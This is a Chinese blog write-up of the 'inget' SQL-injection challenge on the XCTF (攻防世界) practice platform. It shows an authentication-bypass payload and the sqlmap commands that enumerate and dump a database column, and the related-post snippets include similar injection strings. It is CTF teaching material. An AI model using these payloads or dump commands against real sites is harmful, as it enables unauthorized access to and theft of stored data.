[攻防世界]-Web:inget解析

最新推荐文章于 2024-05-05 13:01:16 发布
最新推荐文章于 2024-05-05 13:01:16 发布
阅读量518 收藏 1
点赞数 6
分类专栏: Web 文章标签: 前端 java 服务器 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/135892368
版权
文章讲述了作者尝试通过直接输入ID进行爆破未果后,介绍了使用SQLMap工具进行Web表单ID注入攻击的过程,包括选择数据库、表、列以及获取数据的方法,并展示了具体操作步骤和结果截图。
摘要由CSDN通过智能技术生成

查看网页

很明显,他是要我们输入id

这里我尝试了直接爆破,没有成功

解法一(用万能密码):

payload如下:

我这里还尝试了id=1' or true # 没有成功,应该是题目把#给过滤了

解法二:

用sqlmap工具

用法:

-D 选择数据库

-T 选择表

-C 选择列

--tables 列出所有表

--columns 列出所有列

--dump 打印出数据

依次输入

sqlmap -u "网页地址?id=1" --dbs

sqlmap -u "网页地址?id=1" -D cyber --tables

sqlmap -u "网页地址?id=1" -D cyber -T cyber --columns

sqlmap -u "网页地址?id=1" -D cyber -T cyber -C pw --dump

如图

clxhzg
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 | CTF】攻防世界 inget 解题详析
等风来
07-23 4259
由于该语句为真,却无回显,故可排除数字型注入。语句,再根据回显做下一步判断。思路:尝试利用or构造。使用sqlmap爆数据。
攻防世界WEB练习-inget
热门推荐
不知名白帽的博客
09-01 1万+
攻防世界WEB练习-inget
攻防世界-Web-inget新手
wangwei011的博客
05-16 1177
攻防世界-Web-inget
攻防世界】CTF 网络安全学习180天 之 inget
Bing_Geng的博客
11-15 635
综合的考察了SQL注入绕过,且提示较其他难度为1的题目较少,是一个学习SQL注入的入门经典例题
攻防世界inget
qq_55510415的博客
04-22 529
现在传入id=1' or 1=1-- -就变成了'id=1' or 1=1-- -',id=1或者1=1返回都是true,-- abc表示注释后面代码。由此可获得flag。对url进行修改添加/?原本当传入id的时候例如id=1就是'id=1'思路:通过id进行sql注入。请输入ID,并尝试绕过。
攻防世界-inget
m0_62094846的博客
10-06 1241
看到说id,可能id是参数,尝试了几个数,页面都没有变化,也没有延时回显。看了wp,确实是sql注入,注入点是id,用sqlmap扫就可以出来。源代码里没有东西,御剑之类的也扫不到。
攻防世界inget(sqlmap方法)
最新发布
2302_78972359的博客
05-05 761
加上id,--dbs是用来爆数据库的,查看当前数据使用的数据库,中间可能会有提示,输入y即可。确实是sql注入,我用的是sqlmap,也可以在url构造,与sqlmap同理。这里我们查看第一个数据库cyber,输入指令,可以查看cyber库下的表名。可以看到cyber库下就一个表,也叫cyber,输入指令查看表内字段。cyber表内有三个字段,首先怀疑这个pw,查看字段内容,输入指令。打开虚拟机,终端输入sqlmap,如果是以下页面则说明可用。这个id是我们测试的参数,如果没这个id的话会像这样报错。
攻防世界 inget
zhongjl666的博客
10-01 1249
攻防世界 inget
m box 2 mini 驱动
11-08
"M Box 2 Mini" 是一款小型的数字音频接口设备,主要用在音乐制作、录音室以及个人电脑音乐创作中。驱动程序是使硬件设备与操作系统相互通信的关键软件,对于M Box 2 Mini来说,驱动的重要性不言而喻。...
攻防世界:inget&php_rce&Web_php_include&unserialize3
weixin_74473832的博客
03-15 682
查了一下str.replace (old, new max]) 有三个参数,old是需要替换的值,new是替换后的值,max是最多替换的次数。这里的意思大概就是要用get方式提交一个page参数,但是会过滤掉page的值里面的php://。代码的意思大概是有一个xctf的类,会调用wakeup魔术方法,然后会回显bad requests。根据题目说的php-rce,去浏览器搜索这个版本的thinkphp框架的历史命令执行漏洞。这里用的是or,前后关系中只要一个对的,这个关系式就是真的,所以成功绕过。
攻防世界-inget(简单的SQL注入、万能密码)
Welcome To Myon'Blog !
04-14 4847
inget(简单的SQL注入)、手工注入、万能密码原理、sqlmap实现、常用参数
攻防世界--fileclude && fileinclude && inget && easytornado
08-25 2250
file2中包含数据file_get_contents。直接访问flag.php只显示WRONG WAY!说明flag应该在flag.php的注释里。file2使用php伪协议传数据。两个参数file1和file2。
攻防世界web区get_post
Zeker62的博客
08-14 228
考察一个页面如何手动提交get方法传参和post方法传参 get方法直接再浏览器中的url链接中输入/?a=1即可,而post方法则需要借助hackbar工具进行post传参,如下图所示:
攻防世界--IgniteMe
Hk_Mayfly的博客
10-21 314
测试文件:https://adworld.xctf.org.cn/media/task/attachments/fac4d1290e604fdfacbbe06fd1a5ca39.exe 1.准备 获取信息: 32位文件 2.IDA打开 打开main函数 1 int __cdecl main(int argc, const char **argv,...
攻防世界:get_post
qq_57061511的博客
06-13 396
get传参方法是:/?名字=值;post传参用到火狐插件Max Hackbar 题目先让我们用get的方式传名为a值为1的参数,所以我们只需要在url窗口后输入:/?a=1回车,又让我们
攻防世界 IgniteMe wp
__ys的博客
12-08 401
IgniteMe 丢入IDA,进入main函数 发现flag是由EIS
攻防世界新手区部分web wp 2
fcz___的博客
02-09 1297
攻防世界web新手区部分wp
攻防世界web新手区刷题
m0_64583632的博客
11-22 692
攻防世界新手区随机刷题file_include、easyphp、inget、fakebook、Web_python_template_injection
攻防世界GET_POST‘s writeup
m0_66160077的博客
07-05 3025
1) “GET方式”:GET作为四种HTTP请求方法之一(剩下三种分别为HEAD、POST、PUT。常见只有GET和POST两种HTTP请求方式),GET请求主要是用于‘传参’,但参数会直观地显示在URL中;POST请求主要是用于隐藏‘传参’,POST请求常见用于账户密码登录。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值